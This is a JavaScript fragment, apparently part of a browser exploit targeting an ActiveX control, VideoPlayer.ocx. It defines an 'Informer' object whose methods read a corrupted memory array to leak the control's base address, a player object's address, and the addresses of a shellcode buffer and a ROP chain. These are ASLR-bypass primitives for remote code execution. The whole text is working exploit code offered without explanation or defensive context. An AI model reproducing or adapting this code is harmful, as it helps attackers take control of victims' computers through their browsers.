var Informer = function(infArray, mem, ref) { this.infoLeakArray = infArray; this.memoryArray = mem; this.referenceAddress = ref; }; // Calculate VideoPlayer.ocx base Informer.prototype.leakVideoPlayerBase = function(videoPlayerObj) { this.infoLeakArray[0] = videoPlayerObj; // set HTMLObjectElement as first element //alert(mem[0x11120020/4].toString(16)) var arrayElemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4]; // leak array elem. @ 0x11120020 (obj) var objPtr = this.memoryArray[arrayElemPtr/4 + 6]; // deref array elem. + 0x18 var heapPtrVideoplayer = this.memoryArray[objPtr/4 + 25]; // deref HTMLObjectElement + 0x64 // deref heap pointer containing VideoPlayer.ocx pointer var videoplayerPtr = this.memoryArray[heapPtrVideoplayer/4]; var base = videoplayerPtr - 0x6b3b0; // calculate base return base; }; // Calculate VideoPlayer object addres Informer.prototype.leakVideoPlayerAddress = function(videoPlayerObj) { this.infoLeakArray[0] = videoPlayerObj; // set HTMLObjectElement as first element //alert(mem[0x11120020/4].toString(16)) var arrayElemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4]; // leak array elem. @ 0x11120020 (obj) var objPtr = this.memoryArray[arrayElemPtr/4 + 6]; // deref array elem. + 0x18 return objPtr; }; // Calculate the shellcode address Informer.prototype.leakShellcodeAddress = function(shellcodeBuffer) { this.infoLeakArray[0] = shellcodeBuffer; // therefore, leak array element at 0x11120020 (typed array header of // Uint8Array containing shellcode) ... var elemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4]; // ...and deref array element + 0x1c (=> leak shellcode's buffer address) var shellcodeAddr = this.memoryArray[(elemPtr/4) + 7] return shellcodeAddr; }; Informer.prototype.leakRopAddress = function(ropArray) { this.infoLeakArray[0] = ropArray // leak array element at 0x11120020 (typed array header) var elemPtr = this.memoryArray[(this.referenceAddress + 0x1010)/4]; // deref array element + 0x1c (leak rop's buffer address) var ropAddr = this.memoryArray[(elemPtr/4) + 7] // payload address return ropAddr; };